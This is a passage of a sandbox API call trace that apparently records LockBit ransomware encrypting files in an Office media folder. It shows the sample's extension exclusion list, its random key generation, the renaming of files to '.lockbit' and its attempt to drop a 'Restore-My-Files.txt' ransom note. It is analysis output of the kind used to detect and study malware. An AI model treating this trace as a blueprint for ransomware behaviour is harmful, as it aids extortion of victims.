(lpString1=".nls", lpString2=".GIF") returned 1 [0209.734] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0209.734] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0209.734] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0209.734] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0209.734] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0209.734] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0209.734] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0209.735] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0209.735] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0209.735] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0209.735] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0209.735] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0209.735] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0209.735] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0209.735] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0209.735] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0209.736] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0209.736] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0209.736] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0209.736] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0209.736] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0209.736] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0209.736] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0209.736] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0209.736] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0209.736] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0209.736] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0209.736] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0209.736] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0209.736] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0209.736] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0209.736] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0209.736] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0209.736] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0209.736] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0209.736] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0209.736] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21321_.GIF") returned 1 [0209.736] lstrcmpiW (lpString1="ntldr", lpString2="BD21321_.GIF") returned 1 [0209.736] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21321_.GIF") returned 1 [0209.736] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21321_.GIF") returned 1 [0209.736] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21321_.GIF") returned -1 [0209.736] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21321_.GIF") returned 1 [0209.736] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21321_.GIF") returned 1 [0209.737] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\") returned="" [0209.737] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21321_.GIF") returned=".GIF" [0209.737] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0209.737] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0209.737] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0209.737] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0209.737] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0209.737] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0209.737] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0209.737] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0209.737] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0209.737] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0209.737] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0209.737] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0209.737] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0209.737] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0209.737] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0209.737] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0209.737] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0209.737] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0209.737] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0209.737] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0209.737] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0209.737] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0209.737] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0209.737] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0209.737] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0209.737] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0209.737] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0209.737] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0209.737] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21321_.GIF.lockbit") returned 76 [0209.737] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21321_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd21321_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x238 [0209.738] CreateIoCompletionPort (FileHandle=0x238, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0209.738] malloc (_Size=0x40068) returned 0x3fb00b8 [0209.739] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x3fb00d0 | out: lpFileSize=0x3fb00d0*=2501) returned 1 [0209.739] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.739] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.739] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3ff00ec, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3ff00ec) returned 0x0 [0209.739] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.740] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.740] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3ff00fc, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3ff00fc) returned 0x0 [0209.740] ReadFile (in: hFile=0x238, lpBuffer=0x3fb00ec, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3fb00b8 | out: lpBuffer=0x3fb00ec, lpNumberOfBytesRead=0x0, lpOverlapped=0x3fb00b8) returned 0x0 [0209.744] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21321_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21321_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0209.744] malloc (_Size=0xae) returned 0x1fa2ed8 [0209.744] NtSetInformationFile (FileHandle=0x238, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xae, FileInformationClass=0xa) returned 0x0 [0209.745] free (_Block=0x1fa2ed8) [0209.745] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21321_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES") returned 1 [0209.745] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt") returned 76 [0209.745] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0209.745] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3f5c3b00, ftCreationTime.dwHighDateTime=0x1bd4f57, ftLastAccessTime.dwLowDateTime=0xbcda2ae0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x3f5c3b00, ftLastWriteTime.dwHighDateTime=0x1bd4f57, nFileSizeHigh=0x0, nFileSizeLow=0x4d3, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21322_.GIF", cAlternateFileName="")) returned 1 [0209.745] lstrcmpiW (lpString1=".", lpString2="BD21322_.GIF") returned -1 [0209.745] lstrcmpiW (lpString1="..", lpString2="BD21322_.GIF") returned -1 [0209.745] PathFindExtensionW (pszPath="BD21322_.GIF") returned=".GIF" [0209.745] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0209.745] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0209.745] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0209.745] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0209.745] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0209.745] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0209.745] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0209.745] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0209.746] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0209.746] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0209.746] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0209.746] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0209.746] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0209.746] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0209.746] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0209.746] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0209.746] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0209.746] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0209.746] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0209.746] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0209.746] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0209.746] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0209.746] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0209.746] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0209.746] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0209.746] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0209.746] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0209.746] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0209.746] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0209.746] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0209.746] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0209.746] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0209.747] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0209.747] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0209.747] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0209.747] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0209.747] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0209.747] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0209.747] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0209.747] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0209.747] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0209.747] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0209.747] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0209.747] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0209.747] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0209.747] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0209.747] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0209.747] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21322_.GIF") returned 1 [0209.747] lstrcmpiW (lpString1="ntldr", lpString2="BD21322_.GIF") returned 1 [0209.747] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21322_.GIF") returned 1 [0209.747] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21322_.GIF") returned 1 [0209.747] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21322_.GIF") returned -1 [0209.747] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21322_.GIF") returned 1 [0209.747] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21322_.GIF") returned 1 [0209.747] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\") returned="" [0209.748] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21322_.GIF") returned=".GIF" [0209.748] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0209.748] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0209.748] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0209.748] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0209.748] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0209.748] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0209.748] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0209.748] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0209.748] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0209.748] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0209.748] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0209.748] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0209.748] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0209.748] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0209.748] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0209.748] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0209.748] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0209.748] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0209.748] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0209.748] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0209.748] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0209.748] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0209.748] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0209.748] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0209.749] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0209.749] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0209.749] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0209.749] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0209.749] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21322_.GIF.lockbit") returned 76 [0209.749] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21322_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd21322_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0209.749] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0209.750] malloc (_Size=0x40068) returned 0x3df0008 [0209.750] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=1235) returned 1 [0209.750] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.750] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.750] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0209.750] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.750] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.750] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0209.750] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0209.756] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21322_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21322_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0209.757] malloc (_Size=0xae) returned 0x1fa2ed8 [0209.757] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xae, FileInformationClass=0xa) returned 0x0 [0209.758] free (_Block=0x1fa2ed8) [0209.758] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21322_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES") returned 1 [0209.758] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt") returned 76 [0209.758] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0209.758] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b9c600, ftCreationTime.dwHighDateTime=0x1bd4d50, ftLastAccessTime.dwLowDateTime=0xbcda2ae0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x32b9c600, ftLastWriteTime.dwHighDateTime=0x1bd4d50, nFileSizeHigh=0x0, nFileSizeLow=0x395, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21323_.GIF", cAlternateFileName="")) returned 1 [0209.758] lstrcmpiW (lpString1=".", lpString2="BD21323_.GIF") returned -1 [0209.758] lstrcmpiW (lpString1="..", lpString2="BD21323_.GIF") returned -1 [0209.758] PathFindExtensionW (pszPath="BD21323_.GIF") returned=".GIF" [0209.758] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0209.758] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0209.758] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0209.758] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0209.758] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0209.758] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0209.758] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0209.758] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0209.758] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0209.758] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0209.758] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0209.758] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0209.758] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0209.758] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0209.758] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0209.758] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0209.759] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0209.759] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0209.759] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0209.759] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0209.759] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0209.759] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0209.759] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0209.759] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0209.759] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0209.759] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0209.759] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0209.759] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0209.759] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0209.759] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0209.759] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0209.759] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0209.759] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0209.759] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0209.759] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0209.759] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0209.759] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0209.759] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0209.759] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0209.759] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0209.759] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0209.759] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0209.759] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0209.759] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0209.759] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0209.760] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0209.760] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0209.760] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21323_.GIF") returned 1 [0209.760] lstrcmpiW (lpString1="ntldr", lpString2="BD21323_.GIF") returned 1 [0209.760] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21323_.GIF") returned 1 [0209.760] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21323_.GIF") returned 1 [0209.760] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21323_.GIF") returned -1 [0209.760] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21323_.GIF") returned 1 [0209.760] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21323_.GIF") returned 1 [0209.760] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\") returned="" [0209.760] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21323_.GIF") returned=".GIF" [0209.760] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0209.760] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0209.760] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0209.760] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0209.760] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0209.760] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0209.760] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0209.760] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0209.760] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0209.760] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0209.760] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0209.760] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0209.760] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0209.760] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0209.760] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0209.760] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0209.760] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0209.760] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0209.761] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0209.761] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0209.761] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0209.761] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0209.761] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0209.761] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0209.761] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0209.761] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0209.761] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0209.761] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0209.761] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21323_.GIF.lockbit") returned 76 [0209.761] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21323_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd21323_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0209.765] CreateIoCompletionPort 